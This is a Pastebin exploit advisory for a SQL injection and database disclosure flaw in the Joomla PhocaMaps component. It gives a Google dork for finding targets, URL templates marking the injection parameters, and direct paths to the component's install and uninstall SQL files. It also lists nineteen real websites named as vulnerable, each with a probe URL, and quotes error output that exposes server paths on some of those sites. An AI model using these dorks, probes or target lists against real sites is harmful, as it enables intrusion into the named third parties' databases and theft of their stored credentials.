Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla PhocaMaps 3.0.5 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : phoca.cz/phocamaps
- # Software Download Link : phoca.cz/download/category/38-phoca-maps-plugin
- # Software Information Link : extensions.joomla.org/extension/phoca-maps/
- # Software Affected Version : 1.0.5 - 1.1.1 - 1.1.2 - 2.0.4 - 2.0.5 and 3.0.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_phocamaps''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Phoca Maps is Joomla! CMS component. It displays maps on your site rendered with
- help of Google Maps API or OpenStreetMap API. It is intended to fast and
- simple creation of the map on the website.
- ####################################################################
- # Impact :
- ***********
- * Joomla PhocaMaps 3.0.5 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_phocamaps&view=map&id=[SQL Injection]
- /index.php?option=com_phocamaps&view=map&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_phocamaps&view=map&id=[ID-NUMBER]&Itemid=[SQL Injection]&lang=it
- /index.php?option=com_phocamaps&view=map&id=[SQL Injection]:[MAP-NAME-HERE]&tmpl=component
- ####################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_phocamaps/install.sql
- /administrator/components/com_phocamaps/uninstall.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] kybun-anniviers.ch/v1/index.php?option=com_phocamaps&view=map&id=1%27
- [+] kobercekadan.cz/index.php?option=com_phocamaps&view=map&id=1&Itemid=6%27
- [+] crisbox.co.za/index.php?option=com_phocamaps&view=map&id=1&Itemid=126%27
- [+] comune.acate.rg.it/public/index.php?option=com_phocamaps&view=map&id=1&Itemid=580%27
- [+] fiasverona.it/index.php?option=com_phocamaps&view=map&id=3&Itemid=124%27
- [+] beautyprofessional.it/index.php?option=com_phocamaps&view=map&id=1&Itemid=123%27
- [+] skymusic.vn/index.php?option=com_phocamaps&view=map&id=1&Itemid=74%27
- [+] junior-swim.pl/index.php?option=com_phocamaps&view=map&id=1&Itemid=12%27
- [+] haarley-beckenried.ch/joomla/index.php?option=com_phocamaps&view=map&id=1&Itemid=110%27
- [+] merk.net.pl/index.php?option=com_phocamaps&view=map&id=1&Itemid=10%27
- [+] ilgiardinodeiviandanti.com/index.php?option=com_phocamaps&view=map&id=1%27:sede-giardino&tmpl=component
- [+] castelle.it/index.php?option=com_phocamaps&view=map&id=1&Itemid=139%27&lang=it
- [+] sv-edelstauden.at/index.php?option=com_phocamaps&view=map&id=1&Itemid=55%27
- [+] associazionestillo.it/nuovo/index.php?option=com_phocamaps&view=map&id=1&Itemid=131%27
- [+] die-bohrer.de/index.php?option=com_phocamaps&view=map&id=1&Itemid=53%27
- [+] istitutopalatucci.it/portale/index.php?option=com_phocamaps&view=map&id=1&Itemid=111%27
- [+] atanasiogirardot.edu.co/inicio/index.php?option=com_phocamaps&view=map&id=1%27
- [+] hdcp.cz/o-klubu/index.php?option=com_phocamaps&view=map&id=1&Itemid=171%27
- [+] swimm-pv.cz/index.php?option=com_phocamaps&view=map&id=1&Itemid=534%27
- ####################################################################
- # Example SQL Database Error :
- *****************************
- Deprecated: iconv_set_encoding(): Use of iconv.internal_encoding
- is deprecated in /usr/www/users/crisbvyrus/libraries
- /joomla/string/string.php on line 28
- Strict Standards: Non-static method PhocaMapsPath::getPath() should not be
- called statically, assuming $this from incompatible context in /web/htdocs
- /www.fiasverona.it/home/fias/components/com_phocamaps
- /views/map/view.html.php on line 191
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment